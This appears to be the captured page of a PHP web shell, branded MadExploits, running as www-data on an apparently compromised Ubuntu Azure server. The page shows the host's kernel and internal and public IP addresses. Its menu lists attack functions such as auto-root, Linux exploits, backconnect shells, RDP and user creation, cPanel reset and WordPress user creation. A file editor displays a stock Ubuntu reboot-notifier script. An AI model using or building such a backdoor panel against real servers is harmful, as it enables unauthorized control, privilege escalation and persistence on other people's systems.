Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.23.103.203
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
update-notifier /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
drwxr-xr-x
upgrader-patches
[ DIR ]
drwxr-xr-x
notify-reboot-required
751
B
-rwxr-xr-x
package-data-downloads-failed
27.94
KB
-rw-r--r--
package-data-downloads-failed-...
32.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notify-reboot-required
#!/bin/sh # we do not include ". gettext.sh" here because: # a) it breaks if its not available # b) the string we have here does not need it (because it has no vars) eval_gettext() { if [ -x /usr/bin/gettext ]; then echo $(gettext "$1") else echo "$1" fi } export TEXTDOMAIN=update-notifier export TEXTDOMAINDIR=/usr/share/locale case "$DPKG_MAINTSCRIPT_PACKAGE::$DPKG_MAINTSCRIPT_NAME" in linux-image-extra*::postrm) exit 0;; esac if [ "$0" = "/etc/kernel/postinst.d/update-notifier" ]; then DPKG_MAINTSCRIPT_PACKAGE=linux-base fi # Wake the applet up echo "*** $(eval_gettext "System restart required") ***" > /var/run/reboot-required echo "$DPKG_MAINTSCRIPT_PACKAGE" >> /var/run/reboot-required.pkgs
Close